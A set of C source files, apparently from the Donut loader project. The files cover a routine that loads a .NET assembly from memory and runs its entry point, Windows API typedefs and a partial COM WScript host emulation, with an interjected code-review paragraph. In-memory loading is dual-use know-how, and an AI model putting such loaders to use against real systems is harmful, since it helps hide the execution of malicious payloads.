149 BSTR marshal = SysAllocString(L"System.Management.Automation.PowerShell");
150 hr = as1->GetType_2(marshal, &mars);
151
152 printf("GetType_2(PowerShell) : %lx %p\n", hr, (PVOID)mars);
153
154 DumpMethods(mars);
155
156 // to retrieve a method, the SAFEARRAY is of IUnknown types
157 // this method doesn't accept anything, so just allocate array for it
158 sav = SafeArrayCreateVector(VT_UNKNOWN, 0, 0);
159
160 hr = mars->GetMethod(alloc,
161 (mscorlib::BindingFlags)
162 (mscorlib::BindingFlags_Static | mscorlib::BindingFlags_Public),
163 NULL, // Binder
164 sav, // SAFEARRAY(_Type*)
165 NULL, // Modifiers
166 &mi); // MethodInfo
167
168 printf("System.Management.Automation.PowerShell.GetMethod(Create) : %lx : %p\n", hr, (PVOID)mi);
169
170 v1.vt = VT_EMPTY;
171 VariantClear(&ret);
172
173 hr = mi->Invoke_3(
174 v1,
175 NULL, // arguments to method
176 &ret); // return value from method
177
178 printf("%lx %p %i %i\n", hr, (LPVOID)ret.punkVal, V_VT(&ret), GetLastError());
179
180 // at this point, we have the powershell object. we just need to call AddScript
181 // method, but this is an IDisposable
182
183 sav = SafeArrayCreateVector(VT_UNKNOWN, 0, 1);
184 BSTR object = SysAllocString(L"System.Object");
185
186 as2->GetType_2(object, &ptr);
187 idx = 0;
188 SafeArrayPutElement(sav, &idx, ptr);
189
190 BSTR get_obj = SysAllocString(L"GetIUnknownForObject");
191 BSTR mars_str = SysAllocString(L"System.Runtime.InteropServices.Marshal");
192 hr = as3->GetType_2(mars_str, &mars);
193
194 printf("Marshal : %p\n", (PVOID)mars);
195
196 hr = mars->GetMethod(get_obj,
197 (mscorlib::BindingFlags)
198 (mscorlib::BindingFlags_Static | mscorlib::BindingFlags_Public),
199 NULL, // Binder
200 sav, // SAFEARRAY(_Type*)
201 NULL, // Modifiers
202 &mi); // MethodInfo
203
204 printf("GetMethod() : %lx %p\n", hr, (PVOID)mi);
205
206 sav = SafeArrayCreateVector(VT_VARIANT, 0, 1);
207 idx = 0;
208 SafeArrayPutElement(sav, &idx, &ret.punkVal);
209
210 v1.vt = VT_EMPTY;
211 VARIANT unk;
212 VariantClear(&unk);
213
214 hr = mi->Invoke_3(
215 v1,
216 sav, // arguments to method
217 &unk); // return value from method
218
219 printf("%lx %p\n", hr, (LPVOID)V_BYREF(&unk));
220 getchar();
221 return;
222
223 // SAFEARRAY(_Type*)
224 sav = SafeArrayCreateVector(VT_UNKNOWN, 0, 2);
225
226 // add System.IntPtr
227 BSTR str4 = SysAllocString(L"System.IntPtr");
228 as2->GetType_2(str4, &ptr);
229 //DumpMethods(ptr);
230 idx = 0;
231 hr = SafeArrayPutElement(sav, &idx, ptr);
232
233 // add System.Type
234 BSTR str5 = SysAllocString(L"System.Type");
235 as2->GetType_2(str5, &type);
236 idx = 1;
237 SafeArrayPutElement(sav, &idx, type);
238
239 BSTR str6 = SysAllocString(L"GetIUnknownForObject");
240 BSTR str3 = SysAllocString(L"System.Runtime.InteropServices.Marshal");
241 hr = as1->GetType_2(str3, &mars);
242
243 hr = mars->GetMethod(str6,
244 (mscorlib::BindingFlags)
245 (mscorlib::BindingFlags_Static | mscorlib::BindingFlags_Public),
246 NULL, // Binder
247 sav, // SAFEARRAY(_Type*)
248 NULL, // Modifiers
249 &mi); // MethodInfo
250
251 printf("\nGetMethod(GetDelegateForFunctionPointer) HRESULT : %08lx MethodInfoPtr : %p\n", hr, (void*)mi);
252
253 BSTR str9 = SysAllocString(L"ProcessExit");
254 BSTR strA = SysAllocString(L"System.AppDomain");
255
256 hr = as2->GetType_2(strA, &evt);
257 printf("GetType_2(System.AppDomain) HRESULT : %08lx TypePtr : %p\n", hr, (void*)evt);
258
259 hr = evt->GetEvent(str9,
260 (mscorlib::BindingFlags)
261 (mscorlib::BindingFlags_Instance | mscorlib::BindingFlags_Public),
262 &nfo);
263
264 printf("GetEvent(ProcessExit) HRESULT : %08lx EventInfoPtr : %p\n", hr, (void*)nfo);
265
266 hr = nfo->get_EventHandlerType(&evt);
267 printf("EventHandlerType(ProcessExit) : HRESULT : %08lx TypePtr : %p\n", hr, (void*)evt);
268
269 BSTR type_name, base_name;
270 mscorlib::_TypePtr base_type, ref_type;
271
272 evt->get_name(&type_name);
273 evt->get_BaseType(&base_type);
274 base_type->get_name(&base_name);
275
276 wprintf(L"Event Type : %s\nBase Type : %s\n", type_name, base_name);
277
278 printf("my_function = %p\n", (void*)my_function);
279
280 // SAFEARRAY(VARIANT)
281 sav = SafeArrayCreateVector(VT_VARIANT, 0, 2);
282
283 VariantClear(&v_ptr);
284 V_BYREF(&v_ptr) = (PVOID)my_function;
285 V_VT(&v_ptr) = VT_INT;
286
287 idx = 0;
288 SafeArrayPutElement(sav, &idx, &v_ptr);
289
290 BSTR strZ = SysAllocString(L"System.MultiDelegate");
291 hr = as2->GetType_2(strZ, &type);
292 printf("System.Delegate = %lx, %p\n", hr, (void*)type);
293
294 idx = 1;
295 V_VT(&v_type) = VT_UNKNOWN;
296 V_UNKNOWN(&v_type) = type;
297 SafeArrayPutElement(sav, &idx, &type);
298
299 v1.vt = VT_EMPTY;
300 VariantClear(&ret);
301
302 printf("Calling GetDelegateForFunctionPointer\n");
303 hr = mi->Invoke_3(
304 v1,
305 sav, // arguments to method
306 &ret); // return value from method
307
308 printf("Invoke_3(GetDelegateForFunctionPointer) HRESULT : %08lx : %x : %p\n", hr, V_VT(&ret), V_BYREF(&ret));
309
310 /**if(hr != S_OK) {
311 printf("Failed to obtain delegate\n");
312 return;
313 }*/
314
315 printf("Delegate : %p\n", ret.punkVal);
316
317 hr = ret.punkVal->QueryInterface(IID_IUnknown, (void**)&handler);
318 printf("HRESULT : %08lx : %p\n", hr, (void*)handler);
319
320 hr = ad->add_ProcessExit(handler);
321 printf("HRESULT : %08lx\n", hr);
322
323 sab.lLbound = 0;
324 sab.cElements = len;
325 printf("SafeArrayCreate()\n");
326 sa = SafeArrayCreate(VT_UI1, 1, &sab);
327
328 if(sa != NULL) {
329 CopyMemory(sa->pvData, code, len);
330 printf("AppDomain::Load_3()\n");
331 hr = ad->Load_3(sa, &as);
332 if(SUCCEEDED(hr)) {
333 printf("Assembly::get_EntryPoint()\n");
334 hr = as->get_EntryPoint(&mi);
335 if(SUCCEEDED(hr)) {
336 v1.vt = VT_NULL;
337 v1.plVal = NULL;
338 printf("MethodInfo::Invoke_3()\n");
339 hr = mi->Invoke_3(v1, NULL, &v2);
340 mi->Release();
341 }
342 as->Release();
343 }
344 SafeArrayDestroy(sa);
345 }
346 ad->Release();
347 }
348 iu->Release();
349 }
350 icrh->Stop();
351 }
352 icrh->Release();
353 }
354
355 int main(int argc, char *argv[])
356 {
357 void *mem;
358 struct stat fs;
359 FILE *fd;
360
361 if(argc != 2) {
362 printf("usage: rundotnet <.NET assembly>\n");
363 return 0;
364 }
365
366 // 1. get the size of file
367 stat(argv[1], &fs);
368
369 if(fs.st_size == 0) {
370 printf("file is empty.\n");
371 return 0;
372 }
373
374 // 2. try open assembly
375 fd = fopen(argv[1], "rb");
376 if(fd == NULL) {
377 printf("unable to open \"%s\".\n", argv[1]);
378 return 0;
379 }
380 // 3. allocate memory
381 mem = malloc(fs.st_size);
382 if(mem != NULL) {
383 // 4. read file into memory
384 fread(mem, 1, fs.st_size, fd);
385 // 5. run the program from memory
386 rundotnet(mem, fs.st_size);
387 // 6. free memory
388 free(mem);
389 }
390 // 7. close assembly
391 fclose(fd);
392
393 return 0;
394 }
395
396 /**
397 sav = SafeArrayCreateVector(VT_UNKNOWN, 0, 1);
398 BSTR i32 = SysAllocString(L"System.Int32");
399
400 as2->GetType_2(i32, &ptr);
401 idx = 0;
402 SafeArrayPutElement(sav, &idx, ptr);
403
404 BSTR alloc = SysAllocString(L"AllocHGlobal");
405 BSTR marshal = SysAllocString(L"System.Runtime.InteropServices.Marshal");
406 hr = as1->GetType_2(marshal, &mars);
407
408 hr = mars->GetMethod(alloc,
409 (mscorlib::BindingFlags)
410 (mscorlib::BindingFlags_Static | mscorlib::BindingFlags_Public),
411 NULL, // Binder
412 sav, // SAFEARRAY(_Type*)
413 NULL, // Modifiers
414 &mi); // MethodInfo
415
416 printf("System.Runtime.InteropServices.Marshal.GetMethod(AllocCoTaskMem) : %lx\n", hr);
417
418 sav = SafeArrayCreateVector(VT_VARIANT, 0, 1);
419 idx = 0;
420 V_VT(&v_type) = VT_I4;
421 V_I4(&v_type) = 0x12345678;
422 SafeArrayPutElement(sav, &idx, &v_type);
423
424 v1.vt = VT_EMPTY;
425 VariantClear(&ret);
426
427 printf("Press any key to continue...\n");
428 getchar();
429
430 printf("Calling AllocCoTaskMem\n");
431 hr = mi->Invoke_3(
432 v1,
433 sav, // arguments to method
434 &ret); // return value from method
435
436 printf("%lx %p\n", hr, (LPVOID)V_BYREF(&ret));
437 getchar();
438 return;
439 */
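Review bot: `VariantClear(&ret)` in `rundotnet` is applied to a VARIANT that was never initialised (`ret`, and likewise `unk` and `v_ptr` later), so it inspects garbage `vt`/`punkVal` fields and may call `Release` on a random pointer; these should be `VariantInit(&ret);` (and `VariantInit(&unk);`, `VariantInit(&v_ptr);`), with `VariantClear` reserved for after `Invoke_3` has filled them. In `main` the `stat` and `fread` return values are unchecked, so a failed `stat` leaves `fs.st_size` undefined and a short read hands `rundotnet` a partly filled buffer; `if (stat(argv[1], &fs) != 0) { printf("unable to stat \"%s\".\n", argv[1]); return 0; }` and `if (fread(mem, 1, fs.st_size, fd) != (size_t)fs.st_size) { free(mem); fclose(fd); return 0; }` close both. The code following the unconditional `return;` after the `GetIUnknownForObject` invoke is unreachable and reads as an abandoned experiment; a comment saying so, or moving it into the trailing block comment, would make the file's intent clearer. The many `SysAllocString` results are never released with `SysFreeString`, which is harmless for a one-shot tool but worth a note.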
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #ifndef WINAPI_H
32 #define WINAPI_H
33
34 #include <windows.h>
35
36 typedef void (WINAPI *Sleep_t)(DWORD dwMilliseconds);
37
38 typedef int (WINAPI *MultiByteToWideChar_t)(
39 UINT CodePage,
40 DWORD dwFlags,
41 LPCCH lpMultiByteStr,
42 int cbMultiByte,
43 LPWSTR lpWideCharStr,
44 int cchWideChar);
45
46 typedef int (WINAPI *WideCharToMultiByte_t)(
47 UINT CodePage,
48 DWORD dwFlags,
49 LPCWCH lpWideCharStr,
50 int cchWideChar,
51 LPSTR lpMultiByteStr,
52 int cbMultiByte,
53 LPCCH lpDefaultChar,
54 LPBOOL lpUsedDefaultChar);
55
56 // imports from shlwapi.dll
57 typedef LSTATUS (WINAPI *SHGetValueA_t)(
58 HKEY hkey,
59 LPCSTR pszSubKey,
60 LPCSTR pszValue,
61 DWORD *pdwType,
62 void *pvData,
63 DWORD *pcbData);
64
65 // imports from mscoree.dll
66 typedef HRESULT (WINAPI *CLRCreateInstance_t)(
67 REFCLSID clsid,
68 REFIID riid,
69 LPVOID *ppInterface);
70
71 typedef HRESULT (WINAPI *CorBindToRuntime_t) (
72 LPCWSTR pwszVersion,
73 LPCWSTR pwszBuildFlavor,
74 REFCLSID rclsid,
75 REFIID riid,
76 LPVOID FAR *ppv);
77
78 // imports from ole32.dll
79 typedef HRESULT (WINAPI *CoInitializeEx_t)(
80 LPVOID pvReserved,
81 DWORD dwCoInit);
82
83 typedef void (WINAPI *CoUninitialize_t)(void);
84
85 typedef HRESULT (WINAPI *CoCreateInstance_t)(
86 REFCLSID rclsid,
87 LPUNKNOWN pUnkOuter,
88 DWORD dwClsContext,
89 REFIID riid,
90 LPVOID *ppv);
91
92 typedef HRESULT (WINAPI *CreateStdDispatch_t)(
93 IUnknown *punkOuter,
94 void *pvThis,
95 ITypeInfo *ptinfo,
96 IUnknown **ppunkStdDisp);
97
98 typedef HRESULT (WINAPI *CreateErrorInfo_t)(
99 ICreateErrorInfo **pperrinfo);
100
101 typedef HRESULT (WINAPI *CreateDispTypeInfo_t)(
102 INTERFACEDATA *pidata,
103 LCID lcid,
104 ITypeInfo **pptinfo);
105
106 typedef HRESULT (WINAPI *GetErrorInfo_t)(
107 ULONG dwReserved,
108 IErrorInfo **pperrinfo);
109
110 typedef HRESULT (WINAPI *LoadTypeLib_t)(
111 LPCOLESTR szFile,
112 ITypeLib **pptlib);
113
114 typedef HRESULT (WINAPI *LoadTypeLibEx_t)(
115 LPCOLESTR szFile,
116 REGKIND regkind,
117 ITypeLib **pptlib);
118
119 typedef LCID (WINAPI *GetUserDefaultLCID_t)(VOID);
120
121 // imports from oleaut32.dll
122 typedef HRESULT (WINAPI *SafeArrayGetLBound_t)(
123 SAFEARRAY *psa,
124 UINT nDim,
125 LONG *plLbound);
126
127 typedef HRESULT (WINAPI *SafeArrayGetUBound_t)(
128 SAFEARRAY *psa,
129 UINT nDim,
130 LONG *plUbound);
131
132 typedef SAFEARRAY* (WINAPI *SafeArrayCreate_t)(
133 VARTYPE vt,
134 UINT cDims,
135 SAFEARRAYBOUND *rgsabound);
136
137 typedef SAFEARRAY* (WINAPI *SafeArrayCreateVector_t)(
138 VARTYPE vt,
139 LONG lLbound,
140 ULONG cElements);
141
142 typedef HRESULT (WINAPI *SafeArrayPutElement_t)(
143 SAFEARRAY *psa,
144 LONG *rgIndices,
145 void *pv);
146
147 typedef HRESULT (WINAPI *SafeArrayDestroy_t)(
148 SAFEARRAY *psa);
149
150 typedef BSTR (WINAPI *SysAllocString_t)(
151 const OLECHAR *psz);
152
153 typedef void (WINAPI *SysFreeString_t)(
154 BSTR bstrString);
155
156 // imports from kernel32.dll
157 typedef HMODULE (WINAPI *LoadLibraryA_t)(
158 LPCSTR lpLibFileName);
159
160 typedef FARPROC (WINAPI *GetProcAddress_t)(
161 HMODULE hModule,
162 LPCSTR lpProcName);
163
164 typedef BOOL (WINAPI *AllocConsole_t)(void);
165
166 typedef BOOL (WINAPI *AttachConsole_t)(
167 DWORD dwProcessId);
168
169 typedef BOOL (WINAPI *SetConsoleCtrlHandler_t)(
170 PHANDLER_ROUTINE HandlerRoutine,
171 BOOL Add);
172
173 typedef HANDLE (WINAPI *GetStdHandle_t)(
174 DWORD nStdHandle);
175
176 typedef BOOL (WINAPI *SetStdHandle_t)(
177 DWORD nStdHandle,
178 HANDLE hHandle);
179
180 typedef HANDLE (WINAPI *CreateFileA_t)(
181 LPCSTR lpFileName,
182 DWORD dwDesiredAccess,
183 DWORD dwShareMode,
184 LPSECURITY_ATTRIBUTES lpSecurityAttributes,
185 DWORD dwCreationDisposition,
186 DWORD dwFlagsAndAttributes,
187 HANDLE hTemplateFile);
188
189 typedef HANDLE (WINAPI *CreateEventA_t)(
190 LPSECURITY_ATTRIBUTES lpEventAttributes,
191 BOOL bManualReset,
192 BOOL bInitialState,
193 LPCSTR lpName);
194
195 typedef BOOL (WINAPI *CloseHandle_t)(HANDLE hObject);
196
197 typedef BOOL (WINAPI *SetEvent_t)(HANDLE hEvent);
198
199 typedef DWORD (WINAPI *GetCurrentThreadId_t)(VOID);
200
201 typedef DWORD (WINAPI *GetCurrentProcessId_t)(VOID);
202
203 typedef HHOOK (WINAPI *SetWindowsHookExA_t)(
204 int idHook,
205 HOOKPROC lpfn,
206 HINSTANCE hmod,
207 DWORD dwThreadId);
208
209 typedef BOOL (WINAPI *CreateProcessA_t)(
210 LPCSTR lpApplicationName,
211 LPSTR lpCommandLine,
212 LPSECURITY_ATTRIBUTES lpProcessAttributes,
213 LPSECURITY_ATTRIBUTES lpThreadAttributes,
214 BOOL bInheritHandles,
215 DWORD dwCreationFlags,
216 LPVOID lpEnvironment,
217 LPCSTR lpCurrentDirectory,
218 LPSTARTUPINFOA lpStartupInfo,
219 LPPROCESS_INFORMATION lpProcessInformation);
220
221 typedef DWORD (WINAPI *WaitForSingleObject_t)(
222 HANDLE hHandle,
223 DWORD dwMilliseconds);
224
225 // imports from wininet.dll
226 typedef BOOL (WINAPI *InternetCrackUrl_t)(
227 LPCSTR lpszUrl,
228 DWORD dwUrlLength,
229 DWORD dwFlags,
230 LPURL_COMPONENTS lpUrlComponents);
231
232 typedef HINTERNET (WINAPI *InternetOpen_t)(
233 LPCSTR lpszAgent,
234 DWORD dwAccessType,
235 LPCSTR lpszProxy,
236 LPCSTR lpszProxyBypass,
237 DWORD dwFlags);
238
239 typedef HINTERNET (WINAPI *InternetConnect_t)(
240 HINTERNET hInternet,
241 LPCSTR lpszServerName,
242 INTERNET_PORT nServerPort,
243 LPCSTR lpszUserName,
244 LPCSTR lpszPassword,
245 DWORD dwService,
246 DWORD dwFlags,
247 DWORD_PTR dwContext);
248
249 typedef HINTERNET (WINAPI *HttpOpenRequest_t)(
250 HINTERNET hConnect,
251 LPCSTR lpszVerb,
252 LPCSTR lpszObjectName,
253 LPCSTR lpszVersion,
254 LPCSTR lpszReferrer,
255 LPCSTR *lplpszAcceptTypes,
256 DWORD dwFlags,
257 DWORD_PTR dwContext);
258
259 typedef BOOL (WINAPI *InternetSetOption_t)(
260 HINTERNET hInternet,
261 DWORD dwOption,
262 LPVOID lpBuffer,
263 DWORD dwBufferLength);
264
265 typedef BOOL (WINAPI *HttpSendRequest_t)(
266 HINTERNET hRequest,
267 LPCSTR lpszHeaders,
268 DWORD dwHeadersLength,
269 LPVOID lpOptional,
270 DWORD dwOptionalLength);
271
272 typedef BOOL (WINAPI *HttpQueryInfo_t)(
273 HINTERNET hRequest,
274 DWORD dwInfoLevel,
275 LPVOID lpBuffer,
276 LPDWORD lpdwBufferLength,
277 LPDWORD lpdwIndex);
278
279 typedef BOOL (WINAPI *InternetReadFile_t)(
280 HINTERNET hFile,
281 LPVOID lpBuffer,
282 DWORD dwNumberOfBytesToRead,
283 LPDWORD lpdwNumberOfBytesRead);
284
285 typedef BOOL (WINAPI *InternetCloseHandle_t)(
286 HINTERNET hInternet);
287
288 typedef BOOL (WINAPI *CryptAcquireContext_t)(
289 HCRYPTPROV *phProv,
290 LPCSTR szContainer,
291 LPCSTR szProvider,
292 DWORD dwProvType,
293 DWORD dwFlags);
294
295 typedef void (WINAPI *GetSystemInfo_t)(
296 LPSYSTEM_INFO lpSystemInfo);
297
298 typedef SIZE_T (WINAPI *VirtualQuery_t)(
299 LPCVOID lpAddress,
300 PMEMORY_BASIC_INFORMATION lpBuffer,
301 SIZE_T dwLength);
302
303 typedef BOOL (WINAPI *VirtualProtect_t)(
304 LPVOID lpAddress,
305 SIZE_T dwSize,
306 DWORD flNewProtect,
307 PDWORD lpflOldProtect);
308
309 typedef HMODULE (WINAPI *GetModuleHandleA_t)(
310 LPCSTR lpModuleName);
311
312 typedef HMODULE (WINAPI *LoadLibraryExA_t)(
313 LPCSTR lpLibFileName,
314 HANDLE hFile,
315 DWORD dwFlags);
316
317 typedef HMODULE (WINAPI *LoadLibraryExW_t)(
318 LPCWSTR lpLibFileName,
319 HANDLE hFile,
320 DWORD dwFlags);
321
322 typedef BOOL (WINAPI *CryptStringToBinaryA_t)(
323 LPCSTR pszString,
324 DWORD cchString,
325 DWORD dwFlags,
326 BYTE *pbBinary,
327 DWORD *pcbBinary,
328 DWORD *pdwSkip,
329 DWORD *pdwFlags);
330
331 typedef BOOL (WINAPI *CryptDecodeObjectEx_t)(
332 DWORD dwCertEncodingType,
333 LPCSTR lpszStructType,
334 const BYTE *pbEncoded,
335 DWORD cbEncoded,
336 DWORD dwFlags,
337 PCRYPT_DECODE_PARA pDecodePara,
338 void *pvStructInfo,
339 DWORD *pcbStructInfo);
340
341 typedef BOOL (WINAPI *CryptImportPublicKeyInfo_t)(
342 HCRYPTPROV hCryptProv,
343 DWORD dwCertEncodingType,
344 PCERT_PUBLIC_KEY_INFO pInfo,
345 HCRYPTKEY *phKey);
346
347 typedef BOOL (WINAPI *CryptCreateHash_t)(
348 HCRYPTPROV hProv,
349 ALG_ID Algid,
350 HCRYPTKEY hKey,
351 DWORD dwFlags,
352 HCRYPTHASH *phHash);
353
354 typedef BOOL (WINAPI *CryptHashData_t)(
355 HCRYPTHASH hHash,
356 const BYTE *pbData,
357 DWORD dwDataLen,
358 DWORD dwFlags);
359
360 typedef BOOL (WINAPI *CryptVerifySignature_t)(
361 HCRYPTHASH hHash,
362 const BYTE *pbSignature,
363 DWORD dwSigLen,
364 HCRYPTKEY hPubKey,
365 LPCSTR szDescription,
366 DWORD dwFlags);
367
368 typedef BOOL (WINAPI *CryptDestroyHash_t)(
369 HCRYPTHASH hHash);
370
371 typedef BOOL (WINAPI *CryptDestroyKey_t)(
372 HCRYPTKEY hKey);
373
374 typedef BOOL (WINAPI *CryptReleaseContext_t)(
375 HCRYPTPROV hProv,
376 DWORD dwFlags);
377
378 typedef LPVOID (WINAPI *VirtualAlloc_t)(
379 LPVOID lpAddress,
380 SIZE_T dwSize,
381 DWORD flAllocationType,
382 DWORD flProtect);
383
384 typedef BOOL (WINAPI *VirtualFree_t)(
385 LPVOID lpAddress,
386 SIZE_T dwSize,
387 DWORD dwFreeType);
388
389 typedef HLOCAL (WINAPI *LocalFree_t)(
390 HLOCAL hMem);
391
392 typedef HRSRC (WINAPI *FindResource_t)(
393 HMODULE hModule,
394 LPCSTR lpName,
395 LPCSTR lpType);
396
397 typedef HGLOBAL (WINAPI *LoadResource_t)(
398 HMODULE hModule,
399 HRSRC hResInfo);
400
401 typedef LPVOID (WINAPI *LockResource_t)(
402 HGLOBAL hResData);
403
404 typedef DWORD (WINAPI *SizeofResource_t)(
405 HMODULE hModule,
406 HRSRC hResInfo);
407
408 typedef void (WINAPI *RtlZeroMemory_t)(
409 LPVOID Destination,
410 SIZE_T Length);
411 #endif
412
413
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 // initialize interface with methods/properties
32 static HRESULT Host_New(PDONUT_INSTANCE inst, IHost *host) {
33 HRESULT hr;
34
35 // IUnknown interface
36 host->lpVtbl->QueryInterface = ADR(LPVOID, Host_QueryInterface);
37 host->lpVtbl->AddRef = ADR(LPVOID, Host_AddRef);
38 host->lpVtbl->Release = ADR(LPVOID, Host_Release);
39
40 // IDispatch interface
41 host->lpVtbl->GetTypeInfoCount = ADR(LPVOID, Host_GetTypeInfoCount);
42 host->lpVtbl->GetTypeInfo = ADR(LPVOID, Host_GetTypeInfo);
43 host->lpVtbl->GetIDsOfNames = ADR(LPVOID, Host_GetIDsOfNames);
44 host->lpVtbl->Invoke = ADR(LPVOID, Host_Invoke);
45
46 // IHost interface
47 host->lpVtbl->get_Name = ADR(LPVOID, Host_get_Name);
48 host->lpVtbl->get_Application = ADR(LPVOID, Host_get_Application);
49 host->lpVtbl->get_FullName = ADR(LPVOID, Host_get_FullName);
50 host->lpVtbl->get_Path = ADR(LPVOID, Host_get_Path);
51 host->lpVtbl->get_Interactive = ADR(LPVOID, Host_get_Interactive);
52 host->lpVtbl->put_Interactive = ADR(LPVOID, Host_put_Interactive);
53 host->lpVtbl->Quit = ADR(LPVOID, Host_Quit);
54 host->lpVtbl->get_ScriptName = ADR(LPVOID, Host_get_ScriptName);
55 host->lpVtbl->get_ScriptFullName = ADR(LPVOID, Host_get_ScriptFullName);
56 host->lpVtbl->get_Arguments = ADR(LPVOID, Host_get_Arguments);
57 host->lpVtbl->get_Version = ADR(LPVOID, Host_get_Version);
58 host->lpVtbl->get_BuildVersion = ADR(LPVOID, Host_get_BuildVersion);
59 host->lpVtbl->get_Timeout = ADR(LPVOID, Host_get_Timeout);
60 host->lpVtbl->put_Timeout = ADR(LPVOID, Host_put_Timeout);
61 host->lpVtbl->CreateObject = ADR(LPVOID, Host_CreateObject);
62 host->lpVtbl->Echo = ADR(LPVOID, Host_Echo);
63 host->lpVtbl->GetObject = ADR(LPVOID, Host_GetObject);
64 host->lpVtbl->DisconnectObject = ADR(LPVOID, Host_DisconnectObject);
65 host->lpVtbl->Sleep = ADR(LPVOID, Host_Sleep);
66 host->lpVtbl->ConnectObject = ADR(LPVOID, Host_ConnectObject);
67 host->lpVtbl->get_StdIn = ADR(LPVOID, Host_get_StdIn);
68 host->lpVtbl->get_StdOut = ADR(LPVOID, Host_get_StdOut);
69 host->lpVtbl->get_StdErr = ADR(LPVOID, Host_get_StdErr);
70
71 host->m_cRef = 0;
72 host->inst = inst;
73
74 DPRINT("LoadTypeLib(\"%ws\")", inst->wscript_exe);
75 hr = inst->api.LoadTypeLib(inst->wscript_exe, &host->lpTypeLib);
76
77 if(hr == S_OK) {
78 DPRINT("ITypeLib::GetTypeInfoOfGuid");
79
80 hr = host->lpTypeLib->lpVtbl->GetTypeInfoOfGuid(
81 host->lpTypeLib, &inst->xIID_IHost, &host->lpTypeInfo);
82 }
83 DPRINT("HRESULT : %08lx", hr);
84 return hr;
85 }
86
87 // Queries a COM object for a pointer to one of its interface.
88 static HRESULT WINAPI Host_QueryInterface(IHost *iface, REFIID riid, void **ppv) {
89 DPRINT("WScript::QueryInterface");
90
91 if(ppv == NULL) return E_POINTER;
92
93 // we implement the following interfaces
94 if(IsEqualIID(&iface->inst->xIID_IUnknown, riid) ||
95 IsEqualIID(&iface->inst->xIID_IDispatch, riid) ||
96 IsEqualIID(&iface->inst->xIID_IHost, riid))
97 {
98 *ppv = iface;
99 return S_OK;
100 }
101 *ppv = NULL;
102 return E_NOINTERFACE;
103 }
104
105 // Increments the reference count for an interface pointer to a COM object.
106 static ULONG WINAPI Host_AddRef(IHost *iface) {
107 DPRINT("WScript::AddRef");
108
109 _InterlockedIncrement(&iface->m_cRef);
110 return iface->m_cRef;
111 }
112
113 // Decrements the reference count for an interface on a COM object.
114 static ULONG WINAPI Host_Release(IHost *iface) {
115 DPRINT("WScript::Release");
116
117 ULONG ref = _InterlockedDecrement(&iface->m_cRef);
118 return ref;
119 }
120
121 // Retrieves the number of type information interfaces that an object provides (either 0 or 1).
122 static HRESULT WINAPI Host_GetTypeInfoCount(IHost *iface, UINT *pctinfo) {
123 DPRINT("WScript::GetTypeInfoCount");
124
125 if(pctinfo == NULL) return E_POINTER;
126
127 *pctinfo = 1;
128 return S_OK;
129 }
130
131 // Retrieves the type information for an object, which can then be used to get the type information for an interface.
132 static HRESULT WINAPI Host_GetTypeInfo(IHost *iface, UINT iTInfo, LCID lcid, ITypeInfo **ppTInfo) {
133 DPRINT("WScript::GetTypeInfo");
134
135 if(ppTInfo == NULL) return E_POINTER;
136
137 iface->lpTypeInfo->lpVtbl->AddRef(iface->lpTypeInfo);
138 *ppTInfo = iface->lpTypeInfo;
139
140 return S_OK;
141 }
142
143 // Maps a single member and an optional set of argument names to a corresponding set of integer DISPIDs,
144 // which can be used on subsequent calls to Invoke.
145 static HRESULT WINAPI Host_GetIDsOfNames(IHost *iface, REFIID riid,
